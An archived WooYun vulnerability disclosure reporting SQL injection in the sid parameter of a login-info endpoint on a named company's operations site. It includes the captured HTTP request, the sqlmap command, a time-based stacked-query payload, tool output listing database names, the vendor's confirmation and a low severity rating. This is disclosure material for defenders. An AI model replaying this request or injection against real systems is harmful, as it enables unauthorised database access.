乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-21: 细节已通知厂商并且等待厂商处理中 2015-11-23: 厂商已经确认,细节仅向厂商公开 2015-12-03: 细节向核心白帽子及相关领域专家公开 2015-12-13: 细节向普通白帽子公开 2015-12-23: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
POST /updatelogininfo.asp HTTP/1.1Content-Length: 50Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://oms.znv.com:80/Cookie: ASPSESSIONIDCQCRCSBQ=PMOBFEKCEAEODFHHJIGBDLFA; Hm_lvt_afcdbf2a49aeab4c86820ee180f2b8c4=1447921584; Hm_lpvt_afcdbf2a49aeab4c86820ee180f2b8c4=1447921584; defaultimg=1Host: oms.znv.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*sid=*
sqlmap.py -r 1.txt --dbs --time-sec=10
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: sid=';WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008
[16:41:07] [INFO] fetching database names[16:41:07] [INFO] fetching number of databases[16:41:07] [INFO] resumed: 17[16:41:07] [INFO] resumed: bbs_cfg[16:41:07] [INFO] resuming partial value: boa[16:41:07] [WARNING] time-based comparison requires larger statistical model, please wait..............................[16:41:21] [INFO] heuristics detected web page charset 'ISO-8859-2'[16:41:21] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsrdMgr_
参数过滤
危害等级:低
漏洞Rank:5
确认时间:2015-11-23 09:20
力维已经不属于中兴了,不过还是感谢提交
暂无